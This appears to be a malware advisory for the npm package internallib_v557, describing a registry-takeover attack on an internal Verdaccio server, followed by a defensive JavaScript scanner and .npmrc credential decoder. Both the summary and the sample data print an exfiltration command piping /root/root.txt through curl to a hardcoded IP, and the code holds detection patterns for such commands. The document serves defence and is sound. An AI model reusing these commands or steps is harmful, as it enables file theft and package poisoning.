internallib_v557 @1.0.24
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-5678
Ecosystem
npm
Summary
index.js implements a multi-step attack against an internal npm registry. When the exported command() is invoked it: (1) registers a Verdaccio user pwn99 / pwn99pass by sending a curl PUT to http://0.0.0.0:4873/-/user/org.couchdb.user:pwn99; (2) queries the metadata of the existing uhclabs_local_check package; (3) writes /tmp/pwn99/.npmrc containing a base64-encoded _auth for those credentials; (4) runs npm publish to push a malicious uhclabs_local_check@2.0.0 to http://0.0.0.0:4873/, whose package.json scripts.start is cat /root/root.txt | curl -s -d @- http://10.0.0.145:8888/rootflag; and (5) at every step posts the output (user-create response, version listing, publish stdout/stderr, error output) via curl to http://10.0.0.145:8888/step{1..n}. The downstream effect: any installer who later pulls uhclabs_local_check from the internal registry and runs its start script exfiltrates the contents of /root/root.txt to the hardcoded attacker IP. The attacker also leaves a persistent publishing identity on the internal registry, usable for future malicious releases of internal packages. This is a namespace-takeover attack that poisons a second internal package, with a hardcoded C2 beacon and attacker-controlled persistence; there is no legitimate purpose consistent with the package's stated 'internal lib' scope.
Source: amazon-inspector (275af9596caf2b68994ca8282da7e127f8a4478e07888dbae73826328b4e41f2)
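Two checks an operator of an internal Verdaccio registry would want after reading this report, given here as an added example in JavaScript (it is not code from the advisory, from Amazon Inspector, or from the package): a heuristic scan of package.json lifecycle scripts for the read-a-sensitive-file-and-ship-it-to-a-hardcoded-host pattern described in the summary, and a decoder for a stray .npmrc _auth line that recovers which registry account a publish was made under. The sample package.json objects and the .npmrc text are constructed from the summary, not captured data; the indicator patterns, the hook list and the function names scanScripts, shouldBlock and parseNpmrcAuth are this example's own choices.

```javascript
// Added example, not code from the advisory or the package it describes.
// Sample inputs are constructed from the report's summary.

// Scripts npm runs without the user asking for them by name (plus `start`,
// which is the hook the poisoned uhclabs_local_check@2.0.0 abuses).
const LIFECYCLE_HOOKS = new Set([
  'preinstall', 'install', 'postinstall', 'prepare', 'prepublish', 'start',
]);

// Coarse heuristics; each one alone is a signal, not proof of malice.
const INDICATORS = [
  { name: 'reads sensitive path',
    re: /\/root\/|\/etc\/(passwd|shadow)|\/\.ssh\/|\.npmrc/ },
  { name: 'sends a request body with curl/wget',
    re: /\b(curl|wget)\b[^|;&\n]*(-d\s*@-|--data(-binary)?\b|--upload-file\b|-T\s)/ },
  { name: 'hardcoded IPv4 endpoint',
    re: /https?:\/\/(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?\b/ },
  { name: 'pipes output into a network client',
    re: /\|\s*(curl|wget|nc|ncat)\b/ },
];

// Returns one finding per (script, indicator) pair that matches.
function scanScripts(pkg) {
  const findings = [];
  for (const [hook, cmd] of Object.entries(pkg.scripts || {})) {
    for (const { name, re } of INDICATORS) {
      if (re.test(cmd)) {
        findings.push({ hook, indicator: name, autoRuns: LIFECYCLE_HOOKS.has(hook), command: cmd });
      }
    }
  }
  return findings;
}

// Block a version when any auto-running hook trips two distinct indicators;
// a single hit (say, one IP literal) is left for a human to look at.
function shouldBlock(pkg) {
  const byHook = new Map();
  for (const f of scanScripts(pkg)) {
    if (!f.autoRuns) continue;
    if (!byHook.has(f.hook)) byHook.set(f.hook, new Set());
    byHook.get(f.hook).add(f.indicator);
  }
  return [...byHook.values()].some((set) => set.size >= 2);
}

// Decodes every `_auth=` line (default or `//host/:_auth=` scoped form) in an
// .npmrc and returns the account name each one authenticates as. _auth is
// base64("user:password"), so the username is everything before the colon.
function parseNpmrcAuth(text) {
  const accounts = [];
  for (const line of text.split(/\r?\n/)) {
    const m = line.match(/^\s*(?:(\/\/\S*?\/):)?_auth\s*=\s*(\S+)/);
    if (!m) continue;
    const decoded = Buffer.from(m[2], 'base64').toString('utf8');
    const sep = decoded.indexOf(':');
    accounts.push({
      registry: m[1] || '(default)',
      user: sep === -1 ? decoded : decoded.slice(0, sep),
      hasPassword: sep !== -1,
    });
  }
  return accounts;
}

// Constructed from the summary: the poisoned release and a plausible
// earlier, benign release of the same package.
const MALICIOUS_PKG = {
  name: 'uhclabs_local_check',
  version: '2.0.0',
  scripts: { start: 'cat /root/root.txt | curl -s -d @- http://10.0.0.145:8888/rootflag' },
};
const BENIGN_PKG = {
  name: 'uhclabs_local_check',
  version: '1.0.0',
  scripts: { start: 'node server.js', test: 'jest' },
};

// Constructed stand-in for /tmp/pwn99/.npmrc; the _auth value is
// base64("pwn99:pwn99pass").
const SAMPLE_NPMRC = [
  'registry=http://0.0.0.0:4873/',
  '_auth=cHduOTk6cHduOTlwYXNz',
].join('\n');

console.log(JSON.stringify(scanScripts(MALICIOUS_PKG), null, 2));
console.log('block 2.0.0?', shouldBlock(MALICIOUS_PKG), 'block 1.0.0?', shouldBlock(BENIGN_PKG));
console.log(parseNpmrcAuth(SAMPLE_NPMRC));
```

Run it over the package.json of each new version the registry accepts (a Verdaccio publish hook or a periodic walk of the storage directory both work) and over any .npmrc found under unexpected paths such as /tmp. The account name recovered from _auth is what to search for in the registry's htpasswd file and publish logs. Note that step (1) of the attack only works because the registry accepted a self-service user registration; in Verdaccio that is disabled by setting auth.htpasswd.max_users to -1 in config.yaml, and restricting publish on internal package patterns to a named group of maintainers stops an account created by other means from overwriting them.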